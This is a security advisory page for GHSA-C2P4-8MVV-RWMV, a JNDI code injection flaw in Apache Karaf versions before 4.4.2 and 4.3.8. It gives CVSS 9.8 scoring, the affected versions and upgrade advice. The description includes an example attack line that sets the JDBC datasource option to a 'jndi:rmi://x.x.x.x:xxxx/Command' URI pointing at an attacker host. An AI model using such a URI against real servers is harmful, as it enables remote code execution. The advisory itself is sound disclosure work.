Lucene search

K
githubGitHub Advisory DatabaseGHSA-C2P4-8MVV-RWMV
HistoryDec 21, 2022 - 6:30 p.m.

Apache Karaf vulnerable to potential code injection

2022-12-2118:30:22
CWE-20
CWE-74
GitHub Advisory Database
github.com
17
apache karaf
code injection
jdbc jndi url
ldap server
remote code execution
rce
apache karaf 4.4.1
apache karaf 4.3.7
upgrade

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

EPSS

0.001

Percentile

38.6%

This vulnerability is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL. The function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource uses InitialContext.lookup(jndiName) without filtering. A user can modify options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName()); to options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command"); in JdbcLoginModuleTest#setup. This is vulnerable to a remote code execution (RCE) attack when a configuration uses a JNDI LDAP data source URI when an attacker has control of the target LDAP server. This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7. Maintainers encourage the users to upgrade to at least Apache Karaf versions 4.4.2 or 4.3.8.

Affected configurations

Vulners
Node
org.apache.karafapache-karafRange4.4.04.4.2
OR
org.apache.karafapache-karafRange<4.3.8
VendorProductVersionCPE
org.apache.karafapache-karaf*cpe:2.3:a:org.apache.karaf:apache-karaf:*:*:*:*:*:*:*:*

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

EPSS

0.001

Percentile

38.6%

Related for GHSA-C2P4-8MVV-RWMV